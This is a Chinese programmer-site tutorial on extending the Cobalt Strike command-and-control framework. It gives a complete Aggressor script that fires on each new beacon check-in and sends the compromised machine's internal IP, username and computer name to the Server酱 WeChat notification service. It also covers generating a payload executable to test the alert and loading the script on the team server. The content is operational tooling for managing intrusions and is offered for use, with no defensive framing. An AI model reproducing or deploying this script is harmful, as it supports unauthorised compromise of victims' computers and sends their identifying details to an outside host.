欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

Cobalt Strike 设置上线使用微信推送(Server酱)

程序员文章站 2022-07-16 21:29:37
...

先看看设置好后的效果~

Cobalt Strike 设置上线使用微信推送(Server酱)
Cobalt Strike 设置上线使用微信推送(Server酱)

http://sc.ftqq.com/3.version 使用github账号登录,将生成的SCKEY码保存好,并开通微信推送。

Cobalt Strike 设置上线使用微信推送(Server酱)

复制下面代码保存为 http_ftqq.cna 文件。
修改url变量里的参数。

# 循环获取所有beacon
on beacon_initial {

    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
            $output .= $line . "\r\n";
        }

        println($output);
    }
    #获取ip、计算机名、登录账号
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");

    #get一下Server酱的链接
    $url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;

    http_get($url);

}

客户端加载这个cna文件
Cobalt Strike 设置上线使用微信推送(Server酱)

Cobalt Strike 设置上线使用微信推送(Server酱)

然后去生成一个exe,试试看上线会不会提示
Cobalt Strike 设置上线使用微信推送(Server酱)
Cobalt Strike 设置上线使用微信推送(Server酱)

也可以在服务端加载

[host] #服务器的ip地址。

[port] #cs的端口号,启动cs时有显示。

[user] #用户名,用来运行这个脚本的用户名,随便即可。

[pass] #cs的密码,就是启动cs时你设置的密码。

[path] #cna文件的路径。

Cobalt Strike 设置上线使用微信推送(Server酱)

相关标签: 工具使用